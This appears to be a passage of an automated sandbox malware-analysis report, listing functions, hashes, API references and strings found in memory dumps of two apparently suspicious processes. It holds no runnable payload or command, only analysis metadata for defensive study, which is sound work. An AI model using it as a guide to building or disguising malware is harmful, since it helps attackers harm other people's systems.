Instruction Fuzzy Hash: 3190027170240142A54072D89814A4E410597F1303BD5D416A0415554CC91489615321

Function 01092D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fe0cdb09a16702a4504e0a0fca7bcaa652661764d137b61a1c6a4a30fad17ad
Instruction ID: 48a8b4e4b11d00ebbf61f202e77ca879fdf3ad51a8517a58cb8cae3b54a37de9
Opcode Fuzzy Hash: 0fe0cdb09a16702a4504e0a0fca7bcaa652661764d137b61a1c6a4a30fad17ad
Instruction Fuzzy Hash: 2E90026170140003E14071D894286064005E7F1302F95D012E0814554CD91589565322

Function 01093D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6db2bd01cab7aff1805c2e22a7dc930dbda4257ea4df5c80c4b794c845a1ad65
Instruction ID: 488a9a086f0e917910eacfa554cd4c346730c3269a19357c09bb2e1d1fb4c63f
Opcode Fuzzy Hash: 6db2bd01cab7aff1805c2e22a7dc930dbda4257ea4df5c80c4b794c845a1ad65
Instruction Fuzzy Hash: 5690027570140402E51071D89814646004697E0302F95D412A0824558DC65489A1A221

Function 01092DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1de5e7689f893a738b6cbbc09fd2fa33391f77c4e6c57e4cd9461b3c433410
Instruction ID: 0e3dc3211e25da09a9e33b5b5b897879768afc43e669efa12ee27460393d50ef
Opcode Fuzzy Hash: 5e1de5e7689f893a738b6cbbc09fd2fa33391f77c4e6c57e4cd9461b3c433410
Instruction Fuzzy Hash: D890027174140402E14171D884146060009A7E0242FD5C013A0824554EC6558B56AB61

Function 01092DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1a6e0c08fd02f47368b5e63889d8e98c14bd9ae02e659d603d7719df16206cb
Instruction ID: c6e74f75408693a83443a5640805b4b70a3c9d59083a76923a70fb493b178485
Opcode Fuzzy Hash: d1a6e0c08fd02f47368b5e63889d8e98c14bd9ae02e659d603d7719df16206cb
Instruction Fuzzy Hash: 05900261742441526545B1D884145074006A7F02427D5C013A1814950CC5269956D721

Function 01092C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2bfd454c1978239c4eb3e526aa44d454e2873a372c47a65c742bc511de2b4f6
Instruction ID: 2b29e7dbeec821ca38c5371f1d4758e551966b7598d969f088ba4c66cedf1eab
Opcode Fuzzy Hash: f2bfd454c1978239c4eb3e526aa44d454e2873a372c47a65c742bc511de2b4f6
Instruction Fuzzy Hash: CD90027170140842E10071D88414B46000597F0302F95C017A0524654DC615C9517621

Function 01092CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b3d03714d74bbb2603b7c08a96c1e6cc2a34b81b7b9514aa1180417a1cbef1
Instruction ID: 4fab80891cf7cee8785e05f1e969b0ee10453d0f3a32fb5ef625861514077e9c
Opcode Fuzzy Hash: d6b3d03714d74bbb2603b7c08a96c1e6cc2a34b81b7b9514aa1180417a1cbef1
Instruction Fuzzy Hash: 5190027170140402E10075D89418646000597F0302F95D012A5424555EC66589916231

Function 01092CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dba9585a5619bc5b39041f4bd56a1c47093194a8cc09754d508d7644a63c46e
Instruction ID: ee0f6fd16a793b00d76875c1e27c5cee6a7ac0c1379ba8ec34345beeac0dd49c
Opcode Fuzzy Hash: 7dba9585a5619bc5b39041f4bd56a1c47093194a8cc09754d508d7644a63c46e
Instruction Fuzzy Hash: 8A900261B0540402E14071D89428706001597E0202F95D012A0424554DC6598B5567A1

Function 01092CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b496fbdda7356a4a7f2f8ab3447a7e22bdd34e23a2697e69fab81088a89c08d
Instruction ID: 8d3655679691dd312e2411bee3187a6850ba9929c1f28864e2331227312c4e44
Opcode Fuzzy Hash: 9b496fbdda7356a4a7f2f8ab3447a7e22bdd34e23a2697e69fab81088a89c08d
Instruction Fuzzy Hash: 0B90027170140403E10071D89518707000597E0202F95D412A0824558DD65689516221

Function 01092F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e041381be9afd7577aacf4c6b600702640736183db99707ce7c95f1c3bf01b
Instruction ID: 17ed32a63dfae7758baa48e75a9805f0d898c2edec1ce75ccbcb1e1c0b3463fc
Opcode Fuzzy Hash: 06e041381be9afd7577aacf4c6b600702640736183db99707ce7c95f1c3bf01b
Instruction Fuzzy Hash: D59002A174140442E10071D88424B060005D7F1302F95C016E1464554DC619CD526226

Function 01092F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb3659e881ee613c0b2db7484d8de902c9914a0e9480be4b34f5d200387e3f03
Instruction ID: bee19015de1d69169ee99987c1bf5f9a657ca8d559a4e3e7dfed56fdb6517c76
Opcode Fuzzy Hash: eb3659e881ee613c0b2db7484d8de902c9914a0e9480be4b34f5d200387e3f03
Instruction Fuzzy Hash: 589002A171140042E10471D88414706004597F1202F95C013A2554554CC5298D615225

Function 01092F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1211bfc4c7fbe20d132a0f7d351a84cf7b093f29863b1566cd37e4586d1e08
Instruction ID: c94faad65ecfe3e2055ac58c9fa24ec63377dd878e77fd43c5d28f77bf185263
Opcode Fuzzy Hash: 4c1211bfc4c7fbe20d132a0f7d351a84cf7b093f29863b1566cd37e4586d1e08
Instruction Fuzzy Hash: 2090027170180402E10071D8882470B000597E0303F95C012A1564555DC62589516671

Function 01092FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a7333a5202a3d6dd12d6e8874d103a8560867d0c6c50ff9b8a069c0f8e8108
Instruction ID: 425d8f2f3efb5e72eb4ba897b1d06d86798af5ea50113f7a5764477e0f2c2ee3
Opcode Fuzzy Hash: 06a7333a5202a3d6dd12d6e8874d103a8560867d0c6c50ff9b8a069c0f8e8108
Instruction Fuzzy Hash: 2690027170180402E10071D88818747000597E0303F95C012A5564555EC665C9916631

Function 01092FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f02ad3538f695e4e5ff5ec1debb982a65f5f40ed279e08d88b9422c815b1f0
Instruction ID: 19152a8f698cc55aedba6cd68378965d6f8ee4c77fe3e8e8f6aab157757d762a
Opcode Fuzzy Hash: d2f02ad3538f695e4e5ff5ec1debb982a65f5f40ed279e08d88b9422c815b1f0
Instruction Fuzzy Hash: 9A900261B0140042514071E8C8549064005BBF1212795C122A0D98550DC55989655765

Function 01092FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2076d8478c82b1cf1cdbbe38711be7926f691997fe61df6fffb48ee837ebc1
Instruction ID: e7d2c3d4fd9499b54e33143da1faba95c7338b4dcb88d5689eeb8fca280d5a61
Opcode Fuzzy Hash: 9d2076d8478c82b1cf1cdbbe38711be7926f691997fe61df6fffb48ee837ebc1
Instruction Fuzzy Hash: DC900261711C0042E20075E88C24B07000597E0303F95C116A0554554CC91589615621

Function 01092E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e7d4e72ebe36f85f8a4a6bf696b650b03c8b0fe5c5db3ff342f80bfe9c5fa9
Instruction ID: 73c423b269d1c00697147d0aef323ddd05c1e81d02eb24854d82842d1d908ca7
Opcode Fuzzy Hash: d3e7d4e72ebe36f85f8a4a6bf696b650b03c8b0fe5c5db3ff342f80bfe9c5fa9
Instruction Fuzzy Hash: A090026170140402E10271D884246060009D7E1346FD5C013E1824555DC6258A53A232

Function 01092E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e29e614f9dc9977e273e52e7890d60de8f855d4bad901c5a8fed7f94214f1077
Instruction ID: b63b48873cc1882c1bdf5b4114845130b681d7dc96796d309bb4860354435f6f
Opcode Fuzzy Hash: e29e614f9dc9977e273e52e7890d60de8f855d4bad901c5a8fed7f94214f1077
Instruction Fuzzy Hash: 3D900261B0140502E10171D88414616000A97E0242FD5C023A1424555ECA258A92A231

Function 01092EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53a60f1b347c1bf9be64cc9d36fd2f0028b48cd12588132f6bac8f5b68bf481b
Instruction ID: 586c809fc273f0baad0c35c8fedd5bc46e393bbb10ea97a3578e13c2aeffa001
Opcode Fuzzy Hash: 53a60f1b347c1bf9be64cc9d36fd2f0028b48cd12588132f6bac8f5b68bf481b
Instruction Fuzzy Hash: 039002B170140402E14071D88414746000597E0302F95C012A5464554EC6598ED56765

Function 01092EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ec8794942cc79617f763519a6b650a86de3c9ec037544acfe34e5f8a7d441a
Instruction ID: bdcf193e38581623a8d035b9086a6e730f379a1784c9e576428538a108f2e5d4
Opcode Fuzzy Hash: 15ec8794942cc79617f763519a6b650a86de3c9ec037544acfe34e5f8a7d441a
Instruction Fuzzy Hash: 099002A170180403E14075D88814607000597E0303F95C012A2464555ECA298D516235

Function 01092C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 22c71f1671e2c3f6791743576cd4541f112c70da0bc8501e277d1c7f4fc19218
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01092890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0109293C
___swprintf_l.LIBCMT ref: 0109295E
___swprintf_l.LIBCMT ref: 010929A3
___swprintf_l.LIBCMT ref: 010CA52E

Strings

::%hs%u.%u.%u.%u, xrefs: 010CA527
::ffff:0:%u.%u.%u.%u, xrefs: 010CA54E
:%u.%u.%u.%u, xrefs: 010CA5B8
ffff:, xrefs: 010CA504

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 9df61031a2dbe2a29e02144698b941188544ef76f08834b64c69dae5654a5ced
Instruction ID: 291fb1d9475cc92b159f562d1ec9250f1a193899a03a448a4ebf6df632958fa8
Opcode Fuzzy Hash: 9df61031a2dbe2a29e02144698b941188544ef76f08834b64c69dae5654a5ced
Instruction Fuzzy Hash: 2F51C5A5A0011ABBDF11DB9C889097EFBF8BB18640B54C169F4E5D7641E374DE409BA0

Function 01087630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 010C4713
CLIENT(ntdll): Processing section info %ws..., xrefs: 010C4787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 010C4725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010C46FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 010C4742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 010C4655
ExecuteOptions, xrefs: 010C46A0

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 0ebc8ffec744a5802cdd394e0c12ec06a1f638d04a1ae7c34691d8c57177219b
Instruction ID: f62a8483db032cfc78897993bd57f21c5abea4fa4661b920dea9819ac0c8c8f8
Opcode Fuzzy Hash: 0ebc8ffec744a5802cdd394e0c12ec06a1f638d04a1ae7c34691d8c57177219b
Instruction Fuzzy Hash: 7A51383160420AAAEF21BBA8DC95FEE77A8FF58714F1400E9D6C5AB190DB709A41CF50

Function 0109B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0109B6BF

Strings

0, xrefs: 0109B66F
+, xrefs: 0109B65A
0, xrefs: 0109B695
-, xrefs: 0109B650

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: ec2ed6da1069cec544d4faee4f39eab16cf99daa9a61bbe40b4cc1f9705626be
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 4E81A170E052499EEF258E6CE8B1FFEBBE1BF49330F184299D8D1A7291C6349841E751

Function 0108BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 010C7B7F
RTL: Resource at %p, xrefs: 010C7B8E
RTL: Re-Waiting, xrefs: 010C7BAC

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 7f97f9d050caa77e53f343c4435cdf286d51db248c1dbd0b8ba2648d93def852
Instruction ID: f002c1d71c3644a522d6ecd84b35e39eb14ef2fe1a04d9a2630f316c9d37c65a
Opcode Fuzzy Hash: 7f97f9d050caa77e53f343c4435cdf286d51db248c1dbd0b8ba2648d93def852
Instruction Fuzzy Hash: D841E3357047029FD721EF29C840B6ABBE5EF98710F100A5DF9D69B281DB71E4058F91

Function 0108B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C728C

Strings

RTL: Resource at %p, xrefs: 010C72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 010C7294
RTL: Re-Waiting, xrefs: 010C72C1

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 09ab0720f2743c95e19eff21da273d6e025e87bdd3697fef3b60eecab5584c46
Instruction ID: 86dacd0d6d1e29d47b68c1d1488e0bf22fbc5f4d81d7d6534f7b766dd715bb72
Opcode Fuzzy Hash: 09ab0720f2743c95e19eff21da273d6e025e87bdd3697fef3b60eecab5584c46
Instruction Fuzzy Hash: 0A41E231744607ABD721DF29CC41B6AB7E6FB94B20F14461DF9D5AB240DB21E8428FD1

Function 01097D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01097E8B

Strings

+, xrefs: 01097DE8
-, xrefs: 01097DDD

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: aa3f57097edb1a238069eb382dec08929cbfdc58e9a3e197d0c46f457dee2b57
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: F991A372E1020A9BEF64DF6DC8B16BEBBF5AF84720F14455AE9D5A72C0D7308940AF11

Function 01059126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01059191
@, xrefs: 01059175

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: e8415389d11bf9b60955b007b4d4b1bf96fc1bfbaad85907c767cdde2bb3e3d9
Instruction ID: 050dd25d7a0c8c435ca52c7c64bfe9adb428acdc742548181c98764cdf585374
Opcode Fuzzy Hash: e8415389d11bf9b60955b007b4d4b1bf96fc1bfbaad85907c767cdde2bb3e3d9
Instruction Fuzzy Hash: 248129B1D00269DBDB75DB54CC44BEEBBB8AB48754F0041EAEA59B7240D7309E84CFA4

Function 010DCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 010DCFBD

Strings

@, xrefs: 010DCF0A
@4Qw@4Qw, xrefs: 010DCFD5, 010DCFDA, 010DCFF1

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Qw@4Qw
API String ID: 4062629308-2383119779
Opcode ID: 8e20f172652a86dcc3d281bbfe66b6ef007eb6df33894e060dcc7d8baf977f86
Instruction ID: 956e47c0b60d0a84284156c1e3648d7f1cf98616b50881c9422e82781e1c27a3
Opcode Fuzzy Hash: 8e20f172652a86dcc3d281bbfe66b6ef007eb6df33894e060dcc7d8baf977f86
Instruction Fuzzy Hash: 9B41BC71900329DFDB259FA9D940AAEBBB8FF95B50F04406AEA94DB294D7308841CB60

Analysis Process: ydRhqlPsLsIczR.exePID: 4420, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	179
Total number of Limit Nodes:	15

Executed Functions

Function 00E4D4E8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E4D576
GetCurrentThread.KERNEL32 ref: 00E4D5B3
GetCurrentProcess.KERNEL32 ref: 00E4D5F0
GetCurrentThreadId.KERNEL32 ref: 00E4D649

Strings

S{, xrefs: 00E4D514

Memory Dump Source

Source File: 0000000A.00000002.1831497384.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e40000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: Current$ProcessThread
String ID: S{
API String ID: 2063062207-395883740
Opcode ID: add509b7c1470174388b412261007fcbf6e8cc88aa5bbdad25b3d156d944310e
Instruction ID: 9db11f69335c8f6385454c1e8b797185123471cc4564485115f6cbe81dc55b15
Opcode Fuzzy Hash: add509b7c1470174388b412261007fcbf6e8cc88aa5bbdad25b3d156d944310e
Instruction Fuzzy Hash: 12518BB09043498FDB14DFAAD848BAEBBF1EF88304F20805AE419B7291C7759944CF66

Function 00E4D4F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E4D576
GetCurrentThread.KERNEL32 ref: 00E4D5B3
GetCurrentProcess.KERNEL32 ref: 00E4D5F0
GetCurrentThreadId.KERNEL32 ref: 00E4D649

Strings

S{, xrefs: 00E4D514

Memory Dump Source

Source File: 0000000A.00000002.1831497384.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e40000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: Current$ProcessThread
String ID: S{
API String ID: 2063062207-395883740
Opcode ID: f5581d824d778b26fe35dda3c0d024f25b71cacbe7fe450965d29640a70c5a51
Instruction ID: 95b776e389804600bb21672d3c7dcbbb89cd305a87e4a1493292243b80cb569b
Opcode Fuzzy Hash: f5581d824d778b26fe35dda3c0d024f25b71cacbe7fe450965d29640a70c5a51
Instruction Fuzzy Hash: D45156B0900709CFDB14DFAAD948BAEBBF1EF88314F208059E419B72A1D775A944CB65

Function 07145365 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071455A6

Strings

S{, xrefs: 071453AB

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7140000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: CreateProcess
String ID: S{
API String ID: 963392458-395883740
Opcode ID: af914c0b2e9b3ccd16a6f902d861a1f0dddab620f452274878097822f9983e68
Instruction ID: 896525d6fc09290924fd1fa15aae016b32b78f81bdabfb2afb0ba7fcf684bc06
Opcode Fuzzy Hash: af914c0b2e9b3ccd16a6f902d861a1f0dddab620f452274878097822f9983e68
Instruction Fuzzy Hash: 62916CB1D00719DFEB11DFA8C841BEEBBB2BF44311F148569E808A7290DB749995CF91

Function 06B06468 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

S{, xrefs: 06B0678C

Memory Dump Source

Source File: 0000000A.00000002.1934227239.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b00000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID: S{
API String ID: 0-395883740
Opcode ID: f0be112d6faa0e9929dfa2bcde9a212fea064fd4259f80f7299d390440f98c17
Instruction ID: fd9e615f70724a1b9143bc7a7d62fd4cb0b7b51862c38e8cbe8ab11d321bdbc7
Opcode Fuzzy Hash: f0be112d6faa0e9929dfa2bcde9a212fea064fd4259f80f7299d390440f98c17
Instruction Fuzzy Hash: 71913A75A002188FDB54EFA5CA55AADBBF2FF88310F2044A9D405A7391DB35ED41CFA1

Function 07145370 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071455A6

Strings

S{, xrefs: 071453AB

Memory Dump Source

Source File: 0000000A.00000002.1941746664.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

